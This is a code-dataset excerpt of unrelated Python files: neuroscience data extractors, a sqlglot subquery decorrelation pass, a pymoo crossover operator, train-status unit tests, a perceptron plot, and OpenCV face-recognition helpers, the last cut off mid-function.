settings = None\n\n def extract(self, bpod_trials=None, settings=None, **kwargs):\n \"\"\"\n :param: bpod_trials (optional) bpod trials from jsonable in a dictionary\n :param: settings (optional) bpod iblrig settings json file in a dictionary\n 
:param: save (bool) write output ALF files, defaults to False\n :param: path_out (pathlib.Path) output path (defaults to `{session_path}/alf`)\n :return: numpy.ndarray or list of ndarrays, list of filenames\n :rtype: dtype('float64')\n \"\"\"\n self.bpod_trials = bpod_trials\n self.settings = settings\n if self.bpod_trials is None:\n self.bpod_trials = raw.load_data(self.session_path)\n if not self.settings:\n self.settings = raw.load_settings(self.session_path)\n if self.settings is None:\n self.settings = {\"IBLRIG_VERSION_TAG\": \"100.0.0\"}\n elif self.settings[\"IBLRIG_VERSION_TAG\"] == \"\":\n self.settings[\"IBLRIG_VERSION_TAG\"] = \"100.0.0\"\n return super(BaseBpodTrialsExtractor, self).extract(**kwargs)\n\n\ndef run_extractor_classes(classes, session_path=None, **kwargs):\n \"\"\"\n Run a set of extractors with the same inputs\n :param classes: list of Extractor class\n :param save: True/False\n :param path_out: (defaults to alf path)\n :param kwargs: extractor arguments (session_path...)\n :return: dictionary of arrays, list of files\n \"\"\"\n files = []\n outputs = OrderedDict({})\n assert session_path\n # if a single class is passed, convert as a list\n try:\n iter(classes)\n except TypeError:\n classes = [classes]\n for classe in classes:\n cls = classe(session_path=session_path)\n out, fil = cls.extract(**kwargs)\n if isinstance(fil, list):\n files.extend(fil)\n elif fil is not None:\n files.append(fil)\n if isinstance(cls.var_names, str):\n outputs[cls.var_names] = out\n else:\n for i, k in enumerate(cls.var_names):\n outputs[k] = out[i]\n return outputs, files\n\n\ndef _get_task_types_json_config():\n with open(Path(__file__).parent.joinpath('extractor_types.json')) as fp:\n task_types = json.load(fp)\n try:\n # look if there are custom extractor types in the personal projects repo\n import projects.base\n custom_extractors = Path(projects.base.__file__).parent.joinpath('extractor_types.json')\n with open(custom_extractors) as fp:\n custom_task_types = json.load(fp)\n task_types.update(custom_task_types)\n except (ModuleNotFoundError, FileNotFoundError):\n pass\n return task_types\n\n\ndef get_task_protocol(session_path):\n try:\n settings = load_settings(get_session_path(session_path))\n except json.decoder.JSONDecodeError:\n _logger.error(f\"Can't read settings for {session_path}\")\n return\n if settings:\n return settings.get('PYBPOD_PROTOCOL', None)\n else:\n return\n\n\ndef get_task_extractor_type(task_name):\n \"\"\"\n Returns the task type string from the full pybpod task name:\n _iblrig_tasks_biasedChoiceWorld3.7.0 returns \"biased\"\n _iblrig_tasks_trainingChoiceWorld3.6.0 returns \"training'\n :param task_name:\n :return: one of ['biased', 'habituation', 'training', 'ephys', 'mock_ephys', 'sync_ephys']\n \"\"\"\n if isinstance(task_name, Path):\n task_name = get_task_protocol(task_name)\n if task_name is None:\n return\n task_types = _get_task_types_json_config()\n\n task_type = task_types.get(task_name, None)\n if task_type is None:\n task_type = next((task_types[tt] for tt in task_types if tt in task_name), None)\n if task_type is None:\n _logger.warning(f\"No extractor type found for {task_name}\")\n return task_type\n\n\ndef get_session_extractor_type(session_path):\n \"\"\"\n From a session path, loads the settings file, finds the task and checks if extractors exist\n task names examples:\n :param session_path:\n :return: bool\n \"\"\"\n settings = load_settings(session_path)\n if settings is None:\n _logger.error(f'ABORT: No data found in 
\"raw_behavior_data\" folder {session_path}')\n return False\n extractor_type = get_task_extractor_type(settings['PYBPOD_PROTOCOL'])\n if extractor_type:\n return extractor_type\n else:\n return False\n\n\ndef get_pipeline(session_path):\n \"\"\"\n Get the pre-processinf pipeline name from a session path\n :param session_path:\n :return:\n \"\"\"\n stype = get_session_extractor_type(session_path)\n return _get_pipeline_from_task_type(stype)\n\n\ndef _get_pipeline_from_task_type(stype):\n \"\"\"\n Returns the pipeline from the task type. Some tasks types directly define the pipeline\n :param stype: session_type or task extractor type\n :return:\n \"\"\"\n if stype in ['ephys_biased_opto', 'ephys', 'ephys_training', 'mock_ephys', 'sync_ephys']:\n return 'ephys'\n elif stype in ['habituation', 'training', 'biased', 'biased_opto']:\n return 'training'\n else:\n return stype\n", "repo_name": "int-brain-lab/load_trials_df_fix", "sub_path": "ibllib/io/extractors/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 8961, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "abc.ABC", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 33, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 37, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 65, "usage_type": "attribute"}, {"api_name": "ibllib.io.raw_data_loaders._logger.error", "line_number": 66, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders._logger", "line_number": 66, "usage_type": "name"}, {"api_name": "ibllib.io.raw_data_loaders._logger.error", "line_number": 74, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders._logger", "line_number": 74, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 91, "usage_type": "attribute"}, {"api_name": "ibllib.io.raw_data_loaders.load_data", "line_number": 122, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders", "line_number": 122, "usage_type": "name"}, {"api_name": "ibllib.io.raw_data_loaders.load_settings", "line_number": 124, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders", "line_number": 124, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 142, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 165, "usage_type": "call"}, {"api_name": "json.load", "line_number": 166, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 170, "usage_type": "call"}, {"api_name": "projects.base.base", "line_number": 170, "usage_type": "attribute"}, {"api_name": "projects.base", "line_number": 170, "usage_type": "name"}, {"api_name": "json.load", "line_number": 172, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders.load_settings", "line_number": 181, "usage_type": "call"}, {"api_name": "one.alf.files.get_session_path", "line_number": 181, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 182, "usage_type": "attribute"}, {"api_name": "ibllib.io.raw_data_loaders._logger.error", "line_number": 183, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders._logger", "line_number": 183, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 199, "usage_type": "argument"}, {"api_name": "ibllib.io.raw_data_loaders._logger.warning", "line_number": 
209, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders._logger", "line_number": 209, "usage_type": "name"}, {"api_name": "ibllib.io.raw_data_loaders.load_settings", "line_number": 220, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders._logger.error", "line_number": 222, "usage_type": "call"}, {"api_name": "ibllib.io.raw_data_loaders._logger", "line_number": 222, "usage_type": "name"}]} +{"seq_id": "35147401437", "text": "import itertools\n\nfrom sqlglot import exp\nfrom sqlglot.optimizer.scope import traverse_scope\n\n\ndef decorrelate_subqueries(expression):\n \"\"\"\n Rewrite sqlglot AST to remove correlated subqueries.\n\n Subquery decorrelation can only happen if the predicate contains only equalitys and conjunctions.\n Additionally the subquery cannot have limits or offsets.\n\n Example:\n >>> import sqlglot\n >>> expression = sqlglot.parse_one(\"SELECT * FROM x AS x WHERE (SELECT y.a FROM y AS y WHERE x.a = y.a) = 1 \")\n >>> decorrelate_subqueries(expression).sql()\n 'SELECT * FROM x AS x JOIN (SELECT y.a FROM y AS y WHERE TRUE GROUP BY y.a) AS \"_d_0\" ON \"_d_0\".\"a\" = x.a AND (\"_d_0\".a) = 1 WHERE TRUE'\n\n Args:\n expression (sqlglot.Expression): expression to decorrelated\n Returns:\n sqlglot.Expression: qualified expression\n \"\"\"\n sequence = itertools.count()\n\n for scope in traverse_scope(expression):\n select = scope.expression\n where = select.args.get(\"where\")\n\n if not where or where.find(exp.Or) or select.find(exp.Limit, exp.Offset):\n continue\n\n for column in scope.external_columns:\n eq = column.find_ancestor(exp.EQ)\n\n if column.find_ancestor(exp.Where) != where or not eq:\n continue\n\n internal = eq.right if eq.left == column else eq.left\n value = select.selects[0]\n\n # if the join column is not in the select, we need to add it\n # but we can only do so if the original expression is an agg.\n # if the original subquery was (select foo from x where bar = y.bar)\n # adding bar would make the subquery result in more than 1 row...\n # (select foo, bar from x group by bar).\n # a possible optimization is to do a collect on foo and change operations to lists\n if internal not in [\n s.this if isinstance(s, exp.Alias) else s for s in scope.selects\n ]:\n if not value.find(exp.AggFunc):\n continue\n select.select(internal, copy=False)\n\n alias = f\"_d_{next(sequence)}\"\n on = exp.and_(f\"\\\"{alias}\\\".\\\"{internal.text('this')}\\\" = {column.sql()}\")\n\n predicate = select.find_ancestor(exp.Predicate, exp.Exists)\n\n eq.replace(exp.TRUE)\n select.replace(\n exp.Column(\n this=exp.to_identifier(value.alias_or_name),\n table=exp.to_identifier(alias),\n )\n )\n\n if predicate:\n predicate.replace(exp.TRUE)\n\n if isinstance(predicate, exp.Exists):\n select = select.select(internal, append=False)\n elif predicate:\n on = exp.and_(on, predicate)\n\n select = select.group_by(internal, copy=False)\n\n scope.parent.expression.join(\n select,\n on=on,\n join_alias=alias,\n copy=False,\n )\n\n return expression\n", "repo_name": "vdt/sqlglot", "sub_path": "sqlglot/optimizer/decorrelate_subqueries.py", "file_name": "decorrelate_subqueries.py", "file_ext": "py", "file_size_in_byte": 3083, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "itertools.count", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlglot.optimizer.scope.traverse_scope", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlglot.exp.Or", "line_number": 31, "usage_type": "attribute"}, 
{"api_name": "sqlglot.exp", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlglot.exp.Limit", "line_number": 31, "usage_type": "attribute"}, {"api_name": "sqlglot.exp.Offset", "line_number": 31, "usage_type": "attribute"}, {"api_name": "sqlglot.exp.EQ", "line_number": 35, "usage_type": "attribute"}, {"api_name": "sqlglot.exp", "line_number": 35, "usage_type": "name"}, {"api_name": "sqlglot.exp.Where", "line_number": 37, "usage_type": "attribute"}, {"api_name": "sqlglot.exp", "line_number": 37, "usage_type": "name"}, {"api_name": "sqlglot.exp.Alias", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sqlglot.exp", "line_number": 50, "usage_type": "name"}, {"api_name": "sqlglot.exp.AggFunc", "line_number": 52, "usage_type": "attribute"}, {"api_name": "sqlglot.exp", "line_number": 52, "usage_type": "name"}, {"api_name": "sqlglot.exp.and_", "line_number": 57, "usage_type": "call"}, {"api_name": "sqlglot.exp", "line_number": 57, "usage_type": "name"}, {"api_name": "sqlglot.exp.Predicate", "line_number": 59, "usage_type": "attribute"}, {"api_name": "sqlglot.exp", "line_number": 59, "usage_type": "name"}, {"api_name": "sqlglot.exp.Exists", "line_number": 59, "usage_type": "attribute"}, {"api_name": "sqlglot.exp.TRUE", "line_number": 61, "usage_type": "attribute"}, {"api_name": "sqlglot.exp", "line_number": 61, "usage_type": "name"}, {"api_name": "sqlglot.exp.Column", "line_number": 63, "usage_type": "call"}, {"api_name": "sqlglot.exp", "line_number": 63, "usage_type": "name"}, {"api_name": "sqlglot.exp.to_identifier", "line_number": 64, "usage_type": "call"}, {"api_name": "sqlglot.exp", "line_number": 64, "usage_type": "name"}, {"api_name": "sqlglot.exp.to_identifier", "line_number": 65, "usage_type": "call"}, {"api_name": "sqlglot.exp", "line_number": 65, "usage_type": "name"}, {"api_name": "sqlglot.exp.TRUE", "line_number": 70, "usage_type": "attribute"}, {"api_name": "sqlglot.exp", "line_number": 70, "usage_type": "name"}, {"api_name": "sqlglot.exp.Exists", "line_number": 72, "usage_type": "attribute"}, {"api_name": "sqlglot.exp", "line_number": 72, "usage_type": "name"}, {"api_name": "sqlglot.exp.and_", "line_number": 75, "usage_type": "call"}, {"api_name": "sqlglot.exp", "line_number": 75, "usage_type": "name"}]} +{"seq_id": "9354053990", "text": "import numpy as np\n\nfrom pymoo.model.crossover import Crossover\nfrom pymoo.operators.repair.out_of_bounds_repair import repair_out_of_bounds\n\n\nclass SimulatedBinaryCrossover(Crossover):\n def __init__(self, eta, n_offsprings=2, prob_per_variable=0.5, **kwargs):\n super().__init__(2, n_offsprings, **kwargs)\n self.eta = float(eta)\n self.prob_per_variable = prob_per_variable\n\n def _do(self, problem, X, **kwargs):\n\n X = X.astype(np.float)\n _, n_matings, n_var = X.shape\n\n # boundaries of the problem\n xl, xu = problem.xl, problem.xu\n\n #if np.any(X < xl) or np.any(X > xu):\n # raise Exception(\"Simulated binary crossover requires all variables to be in bounds!\")\n\n # crossover mask that will be used in the end\n do_crossover = np.full(X[0].shape, True)\n\n # per variable the probability is then 50%\n do_crossover[np.random.random((n_matings, problem.n_var)) > self.prob_per_variable] = False\n # also if values are too close no mating is done\n do_crossover[np.abs(X[0] - X[1]) <= 1.0e-14] = False\n\n # assign y1 the smaller and y2 the larger value\n y1 = np.min(X, axis=0)\n y2 = np.max(X, axis=0)\n\n # random values for each individual\n rand = np.random.random((n_matings, problem.n_var))\n\n def calc_betaq(beta):\n 
alpha = 2.0 - np.power(beta, -(self.eta + 1.0))\n\n mask, mask_not = (rand <= (1.0 / alpha)), (rand > (1.0 / alpha))\n\n betaq = np.zeros(mask.shape)\n betaq[mask] = np.power((rand * alpha), (1.0 / (self.eta + 1.0)))[mask]\n betaq[mask_not] = np.power((1.0 / (2.0 - rand * alpha)), (1.0 / (self.eta + 1.0)))[mask_not]\n\n return betaq\n\n # difference between all variables\n delta = (y2 - y1)\n\n # now just be sure not dividing by zero (these cases will be filtered later anyway)\n # delta[np.logical_or(delta < 1.0e-10, np.logical_not(do_crossover))] = 1.0e-10\n delta[delta < 1.0e-10] = 1.0e-10\n\n beta = 1.0 + (2.0 * (y1 - xl) / delta)\n betaq = calc_betaq(beta)\n c1 = 0.5 * ((y1 + y2) - betaq * delta)\n\n beta = 1.0 + (2.0 * (xu - y2) / delta)\n betaq = calc_betaq(beta)\n c2 = 0.5 * ((y1 + y2) + betaq * delta)\n\n # do randomly a swap of variables\n b = np.random.random((n_matings, problem.n_var)) <= 0.5\n val = np.copy(c1[b])\n c1[b] = c2[b]\n c2[b] = val\n\n # take the parents as _template\n c = np.copy(X)\n\n # copy the positions where the crossover was done\n c[0, do_crossover] = c1[do_crossover]\n c[1, do_crossover] = c2[do_crossover]\n\n c[0] = repair_out_of_bounds(problem, c[0])\n c[1] = repair_out_of_bounds(problem, c[1])\n\n if self.n_offsprings == 1:\n # Randomly select one offspring\n c = c[np.random.choice(2, X.shape[1]), np.arange(X.shape[1])]\n c = c.reshape((1, X.shape[1], X.shape[2]))\n\n return c\n", "repo_name": "AIasd/ADFuzz", "sub_path": "pymoo/pymoo/operators/crossover/simulated_binary_crossover.py", "file_name": "simulated_binary_crossover.py", "file_ext": "py", "file_size_in_byte": 3026, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pymoo.model.crossover.Crossover", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.float", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.full", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.power", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.copy", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 72, "usage_type": "call"}, {"api_name": "pymoo.operators.repair.out_of_bounds_repair.repair_out_of_bounds", "line_number": 78, "usage_type": "call"}, {"api_name": "pymoo.operators.repair.out_of_bounds_repair.repair_out_of_bounds", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 83, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 83, "usage_type": "call"}]} 
+{"seq_id": "34202592698", "text": "import unittest\n\nfrom scripts.status_manager import parse_statuses_and_update_times, parse_statuses, \\\n get_new_delayed_trains_and_update_times\nfrom scripts.timer import Timer\n\n\nclass StatusManagerTest(unittest.TestCase):\n\n def test_shouldParseStatusesIntDict(self):\n status = \"\"\"Trains Rerouted\n D\n N\n Planned Work\n 2\n 5\n E\n SIR\n Weekday Service\n 1\n 3\n 4\"\"\"\n\n statuses_dict = {'Trains Rerouted': ['D', 'N'], 'Planned Work': ['2', '5', 'E', 'SIR'],\n 'Weekday Service': ['1', '3', '4']}\n\n parsed_statuses_dict = parse_statuses(status)\n\n self.assertDictEqual(statuses_dict, parsed_statuses_dict)\n\n def test_shouldReturnEmptyListGivenNoDelayedTrainsInTrainStatus(self):\n delayed_trains = set()\n train_delay_times = get_test_mta_line_delay_times_dict()\n\n statuses_dict = {'Trains Rerouted': ['D', 'N'], 'Planned Work': ['2', '5', 'E', 'SIR'],\n 'Weekday Service': ['1', '3', '4']}\n new_delayed_trains = get_new_delayed_trains_and_update_times(statuses_dict, delayed_trains, train_delay_times)\n\n self.assertTrue(not new_delayed_trains)\n\n def test_shouldReturnListOfDelayedTrainsGivenDelayedTrainsInTrainStatus(self):\n delayed_trains = set()\n train_delay_times = get_test_mta_line_delay_times_dict()\n\n statuses_dict = {'Trains Rerouted': ['D', 'N'], 'Planned Work': ['2', '5', 'E', 'SIR'],\n 'Delayed': ['A', 'B', 'C', 'F']}\n new_delayed_trains = get_new_delayed_trains_and_update_times(statuses_dict, delayed_trains, train_delay_times)\n\n self.assertEqual(new_delayed_trains, {'A', 'B', 'C', 'F'})\n\n def test_shouldPrintLineRecoveredWhenTrainWasDelayedButNowIsnt(self):\n delayed_trains = {'A', 'B', 'C', 'F'}\n train_delay_times = get_test_mta_line_delay_times_dict()\n train_delay_times['F'].start()\n\n statuses_dict = {'Trains Rerouted': ['D', 'N'], 'Planned Work': ['2', '5', 'E', 'SIR'],\n 'Delayed': ['A', 'B', 'C']}\n new_delayed_trains = get_new_delayed_trains_and_update_times(statuses_dict, delayed_trains, train_delay_times)\n\n self.assertEqual(new_delayed_trains, {'A', 'B', 'C'})\n\n\ndef get_test_mta_line_delay_times_dict():\n return {'R': Timer(),\n 'D': Timer(),\n 'E': Timer(),\n 'N': Timer(),\n 'SIR': Timer(),\n '1': Timer(),\n '2': Timer(),\n '3': Timer(),\n '4': Timer(),\n '5': Timer(),\n '6': Timer(),\n '7': Timer(),\n 'A': Timer(),\n 'B': Timer(),\n 'C': Timer(),\n 'F': Timer(),\n 'S': Timer(),\n 'G': Timer(),\n 'J': Timer(),\n 'L': Timer(),\n 'M': Timer(),\n 'Q': Timer(),\n 'W': Timer()\n }\n", "repo_name": "whelanworkmaster/mta_info_scraper", "sub_path": "tests/status_manager_test.py", "file_name": "status_manager_test.py", "file_ext": "py", "file_size_in_byte": 3139, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestCase", "line_number": 8, "usage_type": "attribute"}, {"api_name": "scripts.status_manager.parse_statuses", "line_number": 27, "usage_type": "call"}, {"api_name": "scripts.status_manager.get_new_delayed_trains_and_update_times", "line_number": 37, "usage_type": "call"}, {"api_name": "scripts.status_manager.get_new_delayed_trains_and_update_times", "line_number": 47, "usage_type": "call"}, {"api_name": "scripts.status_manager.get_new_delayed_trains_and_update_times", "line_number": 58, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 64, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 65, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 
66, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 67, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 68, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 69, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 70, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 71, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 72, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 73, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 74, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 75, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 76, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 77, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 78, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 79, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 80, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 81, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 82, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 83, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 84, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 85, "usage_type": "call"}, {"api_name": "scripts.timer.Timer", "line_number": 86, "usage_type": "call"}]} +{"seq_id": "23143050481", "text": "from Perceptron import *\nfrom Perceptron_applicability import *\nfrom Epochs import *\n\nfrom matplotlib.colors import ListedColormap\n\ndef plot_decision_regions(X, y, classifier, resolution=0.02):\n\n # setup marker generator and color map\n markers = ('s', 'x')\n colours = ('red', 'blue')\n cmap = ListedColormap(colours[:len(np.unique(y))])\n\n # plot the decision surface\n x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\n np.arange(x2_min, x2_max, resolution))\n Z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\n Z = Z.reshape(xx1.shape)\n plt.contourf(xx1, xx2, Z, alpha=0.3, cmap=cmap)\n plt.xlim(xx1.min(), xx1.max())\n plt.ylim(xx2.min(), xx2.max())\n\n # plot class samples\n for idx, cl in enumerate(np.unique(y)):\n plt.scatter(x=X[y == cl, 0], \n y=X[y == cl, 1],\n alpha=0.8, \n c=colours[idx],\n marker=markers[idx], \n label=cl, \n edgecolor='black')\n\n\n\n\nplot_decision_regions(X, y, classifier=ppn)\nplt.xlabel(\"area of kernel [mm*2]\")\nplt.ylabel(\"length of kernel groove [mm]\")\nplt.legend(loc=\"upper left\")\n\nplt.show()", "repo_name": "phillipbrooker/Researching_A_and_AI", "sub_path": "Plot_decision_regions.py", "file_name": "Plot_decision_regions.py", "file_ext": "py", "file_size_in_byte": 1339, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.colors.ListedColormap", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "74629052647", "text": "from config import (\n FONT_SCALE,\n GREEN_COLOR,\n BLACK_COLOR,\n LINE_THICKNESS,\n MATCH_SCALE,\n RESIZE_SIZE,\n TEXT_COORDINATES,\n TEXT_FONT,\n WHITE_COLOR,\n)\nfrom datetime import datetime\nfrom imutils import paths\nimport cv2\nimport json\nimport numpy\nimport os\nimport socket\nimport 
subprocess\n\n\ndef add_date_to_frame(frame: numpy.ndarray) -> None:\n \"\"\"\n Add Date in left top corner of frame\n\n Args:\n frame (numpy.ndarray): Frame captured by camera in Real-Time\n Return:\n None\n \"\"\"\n cv2.putText(\n frame,\n str(datetime.now().replace(microsecond=0)),\n TEXT_COORDINATES,\n TEXT_FONT,\n FONT_SCALE,\n GREEN_COLOR,\n LINE_THICKNESS,\n )\n\n\ndef add_match_to_frame(\n frame: numpy.ndarray,\n prediction_recognition: tuple,\n text_coordinates: str = (520, 360),\n) -> None:\n \"\"\"\n Add Match Found image in right bottom corner of frame\n\n Args:\n frame (numpy.ndarray): Frame captured by camera in Real-Time\n prediction_recognition (tuple): Decision about recognition made by SVM multi-class model\n text_coordinates (tuple): Text location coordinates\n Return:\n None\n \"\"\"\n unknown_path = \"static/assets/images/unknown.png\"\n is_unknown = prediction_recognition[1]\n image_path = (\n json_id_to_image_person(prediction_recognition[0])\n if is_unknown is False\n else unknown_path\n )\n match_image = cv2.imread(f\"{image_path}\")\n size = 100\n logo = cv2.resize(match_image, (size, size))\n added_image = cv2.addWeighted(\n frame[-size - 10 : -10, -size - 10 : -10, :], 0, logo[0:100, 0:100, :], 1, 0\n )\n frame_copy = numpy.copy(frame)\n frame_copy[-size - 10 : -10, -size - 10 : -10, :] = added_image\n cv2.putText(\n frame_copy,\n f\"Match found\",\n text_coordinates,\n TEXT_FONT,\n MATCH_SCALE,\n BLACK_COLOR,\n LINE_THICKNESS,\n )\n return frame_copy\n\n\ndef blur_and_resize_images_in_directory(path_directory: str):\n for image_path in paths.list_images(path_directory):\n image = cv2.imread(image_path)\n image_filtered = cv2.GaussianBlur(image, (3, 3), cv2.BORDER_DEFAULT)\n image_resized = cv2.resize(src=image_filtered, dsize=RESIZE_SIZE)\n cv2.imwrite(image_path, image_resized)\n print(image_path)\n\n\ndef header_face_mask(faces: tuple, frame: numpy.ndarray, prediction: int) -> None:\n \"\"\"\n Bounding box for Face-Mask Detection\n\n Args:\n Inherit from create_bounding_box()\n Return:\n None\n \"\"\"\n prediction_label = json_id_to_mask_label(prediction[0])\n cv2.rectangle(\n frame,\n (faces[0][0] - 1, faces[0][1] - 52),\n (faces[0][0] + faces[0][2] + 1, faces[0][1] - 20),\n WHITE_COLOR,\n -1,\n )\n cv2.putText(\n frame,\n f\"{prediction_label}\",\n (faces[0, 0], faces[0, 1] - 30),\n TEXT_FONT,\n FONT_SCALE,\n BLACK_COLOR,\n LINE_THICKNESS,\n )\n\n\ndef header_face_recognition(\n faces: tuple, frame: numpy.ndarray, prediction: int\n) -> None:\n \"\"\"\n Header for Face-Name Recognition\n\n Args:\n Inherit from create_bounding_box()\n Return:\n None\n \"\"\"\n is_unknown = prediction[1]\n prediction_label = json_id_to_recognition_label(prediction[0])\n cv2.rectangle(\n frame,\n (faces[0, 0] - 1, faces[0, 1] - 20),\n (faces[0, 0] + faces[0, 2] + 1, faces[0, 1] + 5),\n WHITE_COLOR,\n -1,\n )\n cv2.putText(\n frame,\n f'{\"Unknown\" if is_unknown else prediction_label}',\n (faces[0, 0], faces[0, 1]),\n TEXT_FONT,\n FONT_SCALE,\n BLACK_COLOR,\n LINE_THICKNESS,\n )\n return\n\n\ndef face_bounding_box(faces: tuple, frame: numpy.ndarray) -> None:\n \"\"\"\n Bounding box for face detection\n\n Args:\n Inherit from create_bounding_box()\n Return:\n None\n \"\"\"\n cv2.rectangle(\n frame,\n (faces[0, 0], faces[0, 1]),\n (faces[0, 0] + faces[0, 2], faces[0, 1] + faces[0, 3]),\n WHITE_COLOR,\n 2,\n )\n\n\ndef create_bounding_box(\n faces: tuple,\n frame: numpy.ndarray,\n mask_prediction: tuple,\n recognition_prediction: tuple,\n) -> None:\n \"\"\"\n Create bounding box 
for user interface\n\n Args:\n faces (tuple): Coordinates, width and height from faces detected by Haar Cascade Frontal Face\n frame (numpy.ndarray): Frame captured by camera in Real-Time\n mask_prediction (tuple): Prediction about wearing mask in integer\n recognition_prediction (tuple): Prediction about person in integer\n Return:\n None\n \"\"\"\n face_bounding_box(faces, frame)\n header_face_recognition(faces, frame, recognition_prediction)\n header_face_mask(faces, frame, mask_prediction)\n\n\ndef get_ip_address_raspberry() -> str:\n \"\"\"\n Get Raspberry IP address from LAN\n\n Args:\n None\n Return:\n Raspberry PI Local IP address (str)\n \"\"\"\n return subprocess.check_output([\"hostname\", \"-I\"]).decode(\"utf-8\").strip()\n\n\ndef get_ip_address_pc() -> str:\n \"\"\"\n Get PC IP address from LAN\n\n Args:\n None\n Return:\n PC Local IP address (str)\n \"\"\"\n return socket.gethostbyname(socket.gethostname())\n\n\ndef json_id_to_mask_label(id: int) -> str:\n \"\"\"\n Find the label for Face-Mask detection searching by id\n\n Args:\n id (int): Name to make the query in JSON file\n Return:\n Image path located in static folder\n \"\"\"\n with open(\"static/json/mask.json\") as json_file:\n items = json.load(json_file)\n\n item = next((item for item in items if item[\"id\"] == id), None)\n return str(item[\"label\"])\n\n\ndef json_id_to_recognition_label(id: int) -> str:\n \"\"\"\n Find the label for Face-Recognition searching by id\n\n Args:\n id (int): Name to make the query in JSON file\n Return:\n Image path located in static folder\n \"\"\"\n with open(\"static/json/people.json\") as json_file:\n items = json.load(json_file)\n\n item = next((item for item in items if item[\"id\"] == id), None)\n return str(item[\"name\"])\n\n\ndef json_id_to_image_person(id: int) -> str:\n \"\"\"\n Find the image path in json searching by person's name\n\n Args:\n name (str): Name to make the query in JSON file\n Return:\n Image path located in static folder\n \"\"\"\n with open(\"static/json/people.json\") as json_file:\n people = json.load(json_file)\n\n person = next((person for person in people if person[\"id\"] == id), None)\n return str(person[\"image\"])\n\n\ndef rename_images(path_images: str, prefix_name: str) -> 